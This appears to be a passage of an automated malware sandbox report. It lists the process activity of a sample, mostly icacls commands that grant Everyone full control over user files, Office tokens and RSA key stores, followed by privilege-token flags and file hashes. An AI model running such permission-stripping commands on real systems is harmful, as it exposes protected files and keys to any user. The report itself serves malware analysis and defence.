C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\AddGroup.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\AssertNew.emz /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\BackupTrace.tif /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\BlockWait.wmf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ClearWait.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\CompareSwitch.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ConfirmSet.tif /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ConvertGroup.emf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ConvertToPublish.eps /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ConvertToRequest.emf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\DebugResize.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ExpandDisconnect.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\InstallLock.cr2 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\InvokeUse.emf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\JoinTrace.svg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\MeasureDisable.cr2 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\MergeApprove.tiff /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\OutUnlock.svgz /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\PopShow.crw /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\PopUnpublish.gif /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RemoveGrant.eps /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RequestEnable.dxf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RequestGrant.emz /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ResolveRedo.wmf /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RevokeEdit.crw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UnprotectBackup.crw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UnregisterUninstall.emz /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\WaitConvert.ico /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\WatchPing.tiff /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\CloseLock.aiff /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ConfirmHide.txt /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ConvertComplete.kix /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ConvertToRestart.rm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\DenyReceive.wav /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\EnableSearch.css /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ExitDebug.xlsm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\GroupAssert.jpeg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\HideDisconnect.mov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\InstallRestore.png /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\MergeUndo.htm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\MountUnregister.jpeg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\PopRestore.mht /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\PublishCompress.tiff /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\RestartExpand.pdf /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\RestartPing.vbs /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\SaveDebug.dib /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\SaveExport.wax /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\StartRemove.mov /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\TraceResume.mpe /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UndoAssert.odt /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UnregisterBlock.m4a /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\WatchBackup.pptx /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1363905297-3790925001018146473-947902720-32676072-2698771831545134349682734478"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-192654003319468685851016773754-21290101921164816781-1939861613-1155751753748307847"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9179640559562302841379109074425107959-10032419991167373045688934954-263595551"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-212522866-590402947-207282744-304362794-55179482218908590081316156709-511953520"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-239055415-813671708-89462619821972863920816823750839792677005711-1344750021"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "417453626140994921-1959722272-67051847216837455951574935194-985073622165024806"1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_21708db8-17dd-468d-b330-031cf7ec53a2MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
5f5473d6481a39747f80cd1231fee582
SHA1ab1be5cceb9fefdd9a68806e6c136884f12106f9
SHA256f28d28ed90218abc984f6462883d51141ecf88bdff96949626fb3d2cabf6d60c
SHA5123d2f85e3f751e627b23de6255303d1eee3a0183106e1915b1501fc759fe66d41377c5882b3ea62e48fc79ed97aa2afe4ae3ab13d89cfd02d159314fb0cc62990
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6a4692d95527e74b5a17bbbe6a08aafd
SHA1a5451668253da9601e0c467dea5e3672452410d3
SHA2567665af08c77d905084fcecb66ca37c91aa8c9b42f1b59125cdc962270a9f1ad5
SHA512199a5e835d5bc5a0d9fe6fc4be482fe0652046ea95b5434b8b8b147d14203f1aa41655fb97bdc87b5f293ed407f0efbf32c5499e65358a0b4ea9d4b4aa318124
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6a4692d95527e74b5a17bbbe6a08aafd
SHA1a5451668253da9601e0c467dea5e3672452410d3
SHA2567665af08c77d905084fcecb66ca37c91aa8c9b42f1b59125cdc962270a9f1ad5
SHA512199a5e835d5bc5a0d9fe6fc4be482fe0652046ea95b5434b8b8b147d14203f1aa41655fb97bdc87b5f293ed407f0efbf32c5499e65358a0b4ea9d4b4aa318124
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
235eda5864863389e40b2fe712a6192d
SHA11ba4dedbfb1f1c37265fb572efba8a213385e4d9
SHA2564c5ef0e357a794e7b06f1f268c6037129348e951d2e71b7a327bacb2aef4633d
SHA512054ee205af843800647b2f9cb0b8011d0c47ef58845c5d5ef36a45bbc03d454c499e32e9631360179a44eba6a05e93b255d03a645cf0e02f5b8f7b498d51ea86
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
b36ce8f8d83cb412f8d060cefbbb2f3e
SHA1b9560226a6d151f3f24d0eaed202e72107ee2c2c
SHA256e42e9d1198e46e6c1e85cc6f94db1a0ff88ada9658f6491d6785fe042102287a
SHA512e7e62725c389f38009055300990d8165437a242ba5272a81bd87f4c7269429bf6217bf28a850b39996cfc7106db1e2fc5ff8ed928394932a3bd363153c567959
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
761d2d706e0805611f66ca31c791165f
SHA12392b3a3b0d2dde54647ff7c5be55e14d4913b14
SHA256837ee629905e6e32893c363ca5ce79bb8d95f073a61b523c76936ee7aa1c616a
SHA512c90b7ed2419ac34baf2fcf2c4bfce1088e6d5f6d74c15569b8fb8cb49da4c70c7978d762973567ca6d22f3f84459958d40a5466e31f11212f1840d25da9f2d6e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
15379afa7a74393567518181adb73523
SHA17f89f4b85cd7dce360ec0653f930ffddd7e222d3
SHA256d35485e7634e3d785024505fe7b071ef048b9a689452cfe978b06da615bee498
SHA51200d74e2498a431bed966cff8ee91738590c5e5c48c8d82c82506e91cb9bcb97d7e839d8a50a1cd9bb3575915df3fa070b8902c0c0abc86363f8c281890a0bac6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
245b7b623e8eca569702abf3d777fe21
SHA1e60e800a03ccba35e048bdf548001c858e578850
SHA256224c14dd7ef68c835967bf3219933d05dc24805d9d3796713fe8b4d33bfe7011
SHA51297dc988f6b06760399929f35aea64816eb64dfb8270096b2e97f118322d238a88663231dc8ee2e64be98ae750fc54df8ae003299225edfa505a2bf4c6807244a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
b122e44c3ca90927313ed7fb3b26dfde
SHA1048507e4b0ccefe5640c965cf15405347367424e
SHA2567c99cc467b9e12b601d8c962de3ac6ae7319c6913e968e3075994cb3eadd1a0d
SHA5128af3b4a45ba4f394957d727b356508e8f8c16371047763bcbdd0e6a509b16589c56fd213d6137f353a2c28a9a5b4d40f87420a5ad833cd695ac631e9f50ab8a0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
49acf4c81dc2b802b4923bc517a993b8
SHA12a0c9cac0d803705cf01ce7fa79c19f647a262a2
SHA2561919a77aa60330dbb368496222725474b6be0c1cc3d9e48a787d6632aae2ca78
SHA512600381420035e8a80b0fdc2f3f6965520921f84fed98c83eda8b7e5b55f0e4e0e595073f4fd5028ab34dcc7dfad0e0fd639575f12f5f93fc1c18752d73516523
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
fc55dfeb5267c2b80894b82be007015d
SHA18dff99b45a6cb8a01b95960db0df7d2ff639398b
SHA2567d542e11730ca637cfa4dab57505c8dbd60ca8d305ce7777a6e99bb919926fff
SHA512f6530e8759d0f01b30c6c2285d2a1d4c188b8f922d3ed03546aecc38f0449c4cfd432414d029e783aa47def3082bc9b10be10e0e92f507b7f29be110e6c56b0e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
94f58bf5325b263387304b93eb78c2ca
SHA140a3528f3f16fb1d41a128eb2bca5238ad82d737
SHA25675a908676399d5388b41c6634b8be0ecc7b1aa007589e6f0be6ab2df71a1ab67
SHA5127b10f61d4b5ae6137f144f62cb833783d6f1a31768f393b96323d8711e2ec10ea522271358b50e3170e2e87956ad8f1ab2db9b958f73c1f85362efe55756d40e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
7e5fd7b3ebca270e6a7e39c75c259b8c
SHA1efff6f4e846929b89bf8e82185aa3179ea7d30d4
SHA256ac94176f678029ba48c7e3b9794cec1f6bc11848ac0e94115a44e3ced213001d
SHA51239cea4a34a3066a5a979f90bae11d339c0ba1c4a808cdf95788f6264dbc90adc886e2a919f1d0c15a01380c5da9ec15e809c5abe5cd180101e927b4d7fdd49cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
7e5fd7b3ebca270e6a7e39c75c259b8c
SHA1efff6f4e846929b89bf8e82185aa3179ea7d30d4
SHA256ac94176f678029ba48c7e3b9794cec1f6bc11848ac0e94115a44e3ced213001d
